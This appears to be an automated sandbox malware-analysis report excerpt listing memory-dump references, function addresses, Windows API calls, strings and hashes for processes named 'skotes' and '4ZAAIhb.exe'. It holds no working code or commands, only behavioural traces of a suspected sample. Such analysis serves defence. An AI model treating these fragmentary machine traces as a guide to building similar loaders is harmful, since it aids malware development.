Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 3390424672-2046700901
Opcode ID: 223ba6759d8ac1f8e2aa21546b61d8c8b3d68822b4c51a4c954c890f9212ad91
Instruction ID: b3a16856b6a15afc348a1bb80e17844717edbead7f2dbf459080b8daca1e0ad9
Opcode Fuzzy Hash: 223ba6759d8ac1f8e2aa21546b61d8c8b3d68822b4c51a4c954c890f9212ad91
Instruction Fuzzy Hash: EB11E636A002149BCF19FF28C485A6D77ADAFC5364B15846DEC12A7382DB74ED42CBD0

Function 0097B92C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28threadCOMMON

Download Yara Rule

APIs

Concurrency::details::FreeThreadProxy::ReturnIdleProxy.LIBCONCRT ref: 0097B94E
std::invalid_argument::invalid_argument.LIBCONCRT ref: 0097B961

Strings

pContext, xrefs: 0097B959

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: Concurrency::details::FreeIdleProxyProxy::ReturnThreadstd::invalid_argument::invalid_argument
String ID: pContext
API String ID: 548886458-2046700901
Opcode ID: 3908ba09205df6765b344c03b430a4ffcadac127614399087282b7485e830de5
Instruction ID: ca07f6853b2102681f49dd1280824800e0c5717f474f75cd1ea5ade76d2e4504
Opcode Fuzzy Hash: 3908ba09205df6765b344c03b430a4ffcadac127614399087282b7485e830de5
Instruction Fuzzy Hash: 59E0D83AB0020467CF04B765E859EADB77D9FC5B247048115FA25E3391EB70AA05CAD0

Function 009734CC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::invalid_argument::invalid_argument.LIBCONCRT ref: 009734FC

Strings

pScheduler, xrefs: 009734F4
version, xrefs: 009734E1

Memory Dump Source

Source File: 00000006.00000002.2937510596.0000000000951000.00000040.00000001.01000000.00000008.sdmp, Offset: 00950000, based on PE: true

Associated: 00000006.00000002.2937176448.0000000000950000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2937510596.00000000009B2000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938439390.00000000009B9000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938618221.00000000009BB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2938957082.00000000009C5000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939079907.00000000009C6000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2939243238.00000000009C7000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940722734.0000000000B1D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2940988724.0000000000B1F000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941257722.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941445903.0000000000B35000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B37000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2941698268.0000000000B41000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942163259.0000000000B45000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942439132.0000000000B46000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942671509.0000000000B47000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2942953132.0000000000B49000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943176077.0000000000B55000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943428132.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943687914.0000000000B57000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2943929325.0000000000B5B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944212064.0000000000B6A000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944525487.0000000000B6B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2944806255.0000000000B71000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945152540.0000000000B82000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945534979.0000000000B96000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2945854385.0000000000B9B000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946226165.0000000000B9C000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946573191.0000000000BA3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2946939801.0000000000BAA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947312509.0000000000BAC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947594109.0000000000BBE000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2947914571.0000000000BC0000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948235215.0000000000BC1000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948549170.0000000000BC3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2948832412.0000000000BC4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949019082.0000000000BCA000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949315319.0000000000BD2000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949565469.0000000000BD3000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2949851834.0000000000BD4000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950106154.0000000000BDC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950334370.0000000000BDD000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950602259.0000000000BDF000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2950864678.0000000000BEA000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951152869.0000000000BEC000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951385221.0000000000BF3000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000BF5000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2951614135.0000000000C25000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952170568.0000000000C52000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952375131.0000000000C53000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952566299.0000000000C54000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952735873.0000000000C59000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2952926345.0000000000C5B000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953089376.0000000000C69000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000006.00000002.2953301674.0000000000C6A000.00000080.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_950000_skotes.jbxd

Yara matches

Similarity

API ID: std::invalid_argument::invalid_argument
String ID: pScheduler$version
API String ID: 2141394445-3154422776
Opcode ID: af5922464264b6c0a340160363b76622ca91e0c6ecd7186a60c185c24bf07f68
Instruction ID: d2d83b96cdf5dc047ee55011704a9592a91c76cf2c47fb5f0839e5935479f209
Opcode Fuzzy Hash: af5922464264b6c0a340160363b76622ca91e0c6ecd7186a60c185c24bf07f68
Instruction Fuzzy Hash: ADE0CD35940208F7CF2AFB54D847FDC77689B9574DF08C111F854511A19BF89788DAC1

Analysis Process: 4ZAAIhb.exePID: 8000, Parent PID: 7804COMMON

Execution Graph

Execution Coverage:	14.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	813
Total number of Limit Nodes:	20

Executed Functions

Function 000000014000D9C4 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 46
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400126D0: TlsGetValue.KERNEL32 ref: 00000001400126E2
Part of subcall function 00000001400126D0: HeapReAlloc.KERNEL32 ref: 0000000140012762

GetTempPathW.KERNEL32 ref: 000000014000D9F3
LoadLibraryW.KERNEL32 ref: 000000014000DA02
GetProcAddress.KERNEL32 ref: 000000014000DA1D
GetLongPathNameW.KERNELBASE(?,?,?,0000000140001F92), ref: 000000014000DA31
FreeLibrary.KERNEL32 ref: 000000014000DA38

Strings

Kernel32.DLL, xrefs: 000000014000D9F9
GetLongPathNameW, xrefs: 000000014000DA13

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: LibraryPath$AddressAllocFreeHeapLoadLongNameProcTempValue
String ID: GetLongPathNameW$Kernel32.DLL
API String ID: 820969696-2943376620
Opcode ID: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
Instruction ID: 08c74a34c6d82e646fe97c561cc400b119dc1938ee8d5d8dcc972cb306c03a44
Opcode Fuzzy Hash: 7b5facb765f8cdd7be91ebb16a2403b7b75564631065215e584da20e470a0f22
Instruction Fuzzy Hash: 17116D31721B4086EF159F27A9843A967A1FB8CFC0F481029EF4E4B7A5DE39C8528340

Function 0000000140001E57 Relevance: 9.3, APIs: 6, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempFileNameW.KERNEL32 ref: 0000000140001FBF

Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1

Part of subcall function 000000014000CA00: memmove.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,0000000140002CF1), ref: 000000014000CA47

Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266

Part of subcall function 000000014000DA6C: SetFileAttributesW.KERNEL32 ref: 000000014000DA8C
Part of subcall function 000000014000DA6C: DeleteFileW.KERNEL32 ref: 000000014000DA95

Part of subcall function 000000014000D914: wcsncpy.MSVCRT ref: 000000014000D932
Part of subcall function 000000014000D914: wcslen.MSVCRT ref: 000000014000D944
Part of subcall function 000000014000D914: CreateDirectoryW.KERNEL32 ref: 000000014000D994

GetTempFileNameW.KERNEL32 ref: 0000000140002040

Part of subcall function 0000000140012210: HeapReAlloc.KERNEL32 ref: 0000000140012293

GetTempFileNameW.KERNEL32 ref: 00000001400020C1
PathAddBackslashW.SHLWAPI ref: 00000001400020CD
PathRenameExtensionW.SHLWAPI ref: 000000014000212E
GetTempFileNameW.KERNEL32 ref: 0000000140002153

Part of subcall function 0000000140012360: HeapFree.KERNEL32 ref: 000000014001237F

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: File$NameTemp$Heap$AllocErrorLastPathValue$AttributesBackslashCreateDeleteDirectoryExtensionFreeRenamememmovewcslenwcsncpy
String ID:
API String ID: 4232179356-0
Opcode ID: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
Instruction ID: 2ef6d83f5e2b3c8fb19d65fceeff62dc40447b47a2c1a218917e14d6a90cbc88
Opcode Fuzzy Hash: f37d14f45d1a2abd6f91fd25c4a0b9dbf2c58692b7ebd1d65ebe457cd595aad6
Instruction Fuzzy Hash: E38162FBE69644E5EA07B763BC86BED5220D3AD3D4F504410FF08062A3EE3995E64B10

Function 000000014000DE50 Relevance: 9.2, APIs: 6, Instructions: 151
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00000001400112A8: EnterCriticalSection.KERNEL32 ref: 00000001400112C4
Part of subcall function 00000001400112A8: LeaveCriticalSection.KERNEL32 ref: 0000000140011355

CreateFileW.KERNEL32 ref: 000000014000DEED
CreateFileW.KERNEL32 ref: 000000014000DF37
CreateFileW.KERNEL32 ref: 000000014000DF7E
CreateFileW.KERNEL32 ref: 000000014000DFAC
HeapAlloc.KERNEL32 ref: 000000014000DFED
SetFilePointer.KERNEL32 ref: 000000014000E047

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: File$Create$CriticalSection$AllocEnterHeapLeavePointer
String ID:
API String ID: 2685021396-0
Opcode ID: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
Instruction ID: 9fd7d13fb8664e67d48ce56ae15862c74b29b4b7423edb5d501112f331116329
Opcode Fuzzy Hash: bf349e5ae30ca8a1459a9c900c950eddfabbaec973a548aea2fdccc3e75a92be
Instruction Fuzzy Hash: 2B51D4B261469086E761CF17F9007AA7690B39CBE4F04873AFF6A47BE4DB79C4419B10

Function 000000014000593C Relevance: 7.0, APIs: 4, Instructions: 980
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140012450: wcslen.MSVCRT ref: 000000014001246E

Part of subcall function 0000000140012210: TlsGetValue.KERNEL32 ref: 0000000140012223
Part of subcall function 0000000140012210: HeapAlloc.KERNEL32 ref: 0000000140012266

Part of subcall function 0000000140012210: HeapReAlloc.KERNEL32 ref: 0000000140012293

GetModuleHandleW.KERNEL32 ref: 00000001400061AE

Part of subcall function 00000001400121C0: GetLastError.KERNEL32 ref: 00000001400121C4
Part of subcall function 00000001400121C0: TlsGetValue.KERNEL32 ref: 00000001400121D4
Part of subcall function 00000001400121C0: SetLastError.KERNEL32 ref: 00000001400121F1

Part of subcall function 00000001400125D0: TlsGetValue.KERNEL32 ref: 00000001400125DA

Part of subcall function 0000000140007DC0: CharUpperW.USER32 ref: 0000000140007E24

Part of subcall function 0000000140001E57: GetTempFileNameW.KERNEL32 ref: 0000000140001FBF

PathRemoveBackslashW.SHLWAPI ref: 00000001400063A7

Part of subcall function 0000000140012520: TlsGetValue.KERNEL32 ref: 000000014001252A

Part of subcall function 000000014000C45C: SetEnvironmentVariableW.KERNEL32 ref: 000000014000C476

PathQuoteSpacesW.SHLWAPI ref: 00000001400064FF
PathQuoteSpacesW.SHLWAPI ref: 000000014000656B

Part of subcall function 0000000140007284: CreateThread.KERNEL32 ref: 00000001400072B3
Part of subcall function 0000000140007284: EnterCriticalSection.KERNEL32 ref: 00000001400072CC
Part of subcall function 0000000140007284: LeaveCriticalSection.KERNEL32 ref: 0000000140007344

Part of subcall function 0000000140012360: HeapFree.KERNEL32 ref: 000000014001237F

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: Value$HeapPath$AllocCriticalErrorLastQuoteSectionSpaces$BackslashCharCreateEnterEnvironmentFileFreeHandleLeaveModuleNameRemoveTempThreadUpperVariablewcslen
String ID:
API String ID: 2499486723-0
Opcode ID: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
Instruction ID: 5e2f233be3bb1e1a489454234068146e28d45b36aeb09ace1181e30b51997f55
Opcode Fuzzy Hash: 01fd8b8b98fab0c980f96e61b2251792a09e9ddd7d05bec7d734751dcc1b6e06
Instruction Fuzzy Hash: 6C722BB6E25548D6EA16B7B7B8877E95220A3AD394F500411FF4C0B363EE39C5F64B10

Function 000000014000E620 Relevance: 6.1, APIs: 4, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointer.KERNEL32 ref: 000000014000E664
memmove.MSVCRT(?,?,?,?,?,000000014000E5DD), ref: 000000014000E69F

Memory Dump Source

Source File: 00000007.00000002.2767768331.0000000140001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2767669789.0000000140000000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2767891396.0000000140018000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768276964.000000014001F000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.2768507823.0000000140022000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_4ZAAIhb.jbxd

Similarity

API ID: FilePointermemmove
String ID:
